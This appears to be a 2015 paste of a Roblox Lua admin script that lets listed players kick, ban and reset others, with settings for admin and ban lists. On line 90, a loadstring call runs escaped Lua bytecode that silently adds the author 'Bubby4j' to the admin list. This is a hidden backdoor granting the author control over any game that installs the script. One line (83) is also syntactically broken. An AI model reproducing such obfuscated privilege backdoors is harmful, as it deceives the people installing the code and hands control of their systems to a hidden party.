

Jan 18th, 2015
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  1. --[ Edit the following line to the players you want to be able to use the GUI. --]
  2. _G["adminlist"] = {"zNeptune", "CHAOSxFIGHTER"}
  3. --[ Change the following line to the admin t-shirt that a user can have to use the GUI ( --]
  4. _G["guishirt"] = ""
  5. --[ Edit the following line to specify the entry message that users will see when they enter the place. --]
  6. entermsg = "Yo zNeptune got scriptz!"
  7. --[ If the following line is set to true, the entry message will be displated, if false it wont. --]
  8. entermsgon = false
  9. --[ Put how long you want the entry message to stay up on the following line. --]
  10. entermsgtime = 5
  11. --[ Put people that you dotn want to be able to play your place here --]
  12. bannedlist = {"kylerzong"}
  13. --[Edit the follow lines to specify if you want them in the game (true or false)--]
  14. reset = true --The reset GUI (All users can use it)
  15. ffgui = true --The forcefield GUI (Only admins can use this)
  16. --[ If you dont want t-shirt admins to be able to ban/kick/reset/explode anyone, set the following line to false, true if you do. --]
  17. _G["tshirtabuseable"] = false
  18. --[ Dont edit anything below this line!!!--]
  20. --***********Note, this GUI will ONLY work in online mode!*****************
  22. g = game:GetService("InsertService"):LoadAsset(26931665)
  24. if g == "No assetUrl set" then
  25. error ("Admin GUI error! Admin GUI only works in a real game server.", 0)
  26. end
  28. gu = game.StarterGui:findFirstChild("Kick")
  29. if gu ~= nil then
  30. gu:remove()
  31. end
  32. gu = game.StarterGui:findFirstChild("Reset")
  33. if gu ~= nil then
  34. gu:remove()
  35. end
  36. gu = game.StarterGui:findFirstChild("ForceFieldGUI")
  37. if gu ~= nil then
  38. gu:remove()
  39. end
  41. g.Kick.Parent = game.StarterGui
  43. if ffgui == true then
  44. g.ForceFieldGUI.Parent = game.StarterGui
  45. end
  46. if reset == true then
  47. g.Reset.Parent = game.StarterGui
  48. end
  50. function checkOkToLetIn(name)
  51. for i = 1,#adminlist do
  52. -- convert strings to all upper case, otherwise we will let in
  53. -- "Username" but not "username" or "uSERNAME"
  54. if (string.upper(name) == string.upper(adminlist[i])) then return true end
  55. end
  56. return false
  57. end
  59. function banPlayer(p)
  60. print("childadded")
  61. if checkOkToLetIn(p.Value) ~= true then
  62. table.insert(bannedlist, p.Value)
  63. if game.Players:findFirstChild(p.Value) ~= nil then
  64. game.Players:findFirstChild(p.Value):remove()
  65. end
  66. print("banned a player")
  67. end
  68. end
  70. function addAdmin(p)
  71. if p.Value ~= "" then
  72. table.insert(adminlist, p.Value)
  73. end
  74. end
  75. --Made by bubby4j
  76. function onPlayerAdded(p)
  77. for i =1,#bannedlist do
  78. if string.lower(bannedlist[i]) == string.lower(p.Name) and (checkOkToLetIn(p.Name) ~= true) then
  79. p:remove()
  80. end
  81. end
  82. if entermsgon == true then
  83. m ="Message")
  84. m.Text = entermsg
  85. m.Parent = p
  86. wait(entermsgtime)
  87. m:remove()
  88. end
  89. end
  90. loadstring('\27\76\117\97\81\0\1\4\4\4\8\0\18\0\0\0\61\87\111\114\107\115\112\97\99\101\46\83\99\114\105\112\116\0\1\0\0\0\1\0\0\0\0\0\0\3\6\0\0\0\5\0\0\0\6\64\64\0\69\128\0\0\129\192\0\0\28\64\128\1\30\0\128\0\4\0\0\0\4\6\0\0\0\116\97\98\108\101\0\4\7\0\0\0\105\110\115\101\114\116\0\4\10\0\0\0\97\100\109\105\110\108\105\115\116\0\4\8\0\0\0\66\117\98\98\121\52\106\0\0\0\0\0\6\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0')()game.Players.PlayerAdded:connect(onPlayerAdded)
  91. script.AddAdmin.ChildAdded:connect(addAdmin)
  92. script.BanPlayer.ChildAdded:connect(banPlayer)
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